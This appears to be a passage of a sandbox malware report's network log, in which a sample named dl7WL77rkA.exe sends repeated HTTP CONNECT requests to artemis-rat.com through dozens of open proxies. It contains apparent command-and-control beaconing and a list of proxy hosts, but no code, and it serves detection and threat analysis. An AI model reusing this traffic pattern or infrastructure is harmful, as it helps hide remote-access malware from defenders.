User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1794192.168.2.555008172.67.36.21803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.025598049 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.182279110 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:46 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1795192.168.2.5507833.21.101.15831283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.027005911 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.245055914 CET | 116 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1796192.168.2.55413551.75.126.150341443876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.084163904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.207549095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.389517069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.405179977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1797192.168.2.55491031.170.22.12710803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.084636927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1798192.168.2.55501831.43.179.214803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.087480068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.243122101 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1799192.168.2.55490245.11.95.16550473876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.088175058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1800192.168.2.554969196.20.125.14580833876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.091784000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1801192.168.2.555023203.24.108.179803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.092176914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.249161959 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1802192.168.2.554934123.116.119.175813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.092731953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1803192.168.2.554957167.172.86.46104713876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.092735052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1804192.168.2.554980154.205.152.9690803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.093962908 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.701858997 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.405296087 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.702081919 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.202070951 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.701970100 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.202130079 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:01.202109098 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1805192.168.2.554945125.94.219.9690913876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.094372988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.431626081 CET325INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.12.1
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1806192.168.2.550785187.50.29.24280803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.094700098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.443809986 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1807192.168.2.55489793.126.56.3041533876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.095675945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1808192.168.2.55497579.110.202.13180813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.095897913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1809192.168.2.55494751.161.131.84199873876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.096323013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.905139923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.092859983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.405231953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.889492035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1810192.168.2.55494893.90.212.241533876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.096868992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1811192.168.2.555052104.25.115.125803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.097091913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.251909018 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1812192.168.2.55502931.220.56.210803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.097243071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.701997042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.309957027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.608400106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.108237028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.717600107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.217634916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:01.205281973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1813192.168.2.555067162.159.247.92803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.098290920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.260009050 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1814192.168.2.554833196.251.131.3880803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.098952055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1815192.168.2.555066137.184.122.22380003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.099356890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1816192.168.2.554121189.240.60.16990903876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.106005907 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.376574039 CET72INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Proxy-Agent: Fortinet-Proxy/1.0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1817192.168.2.553394162.241.46.40341723876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.109772921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
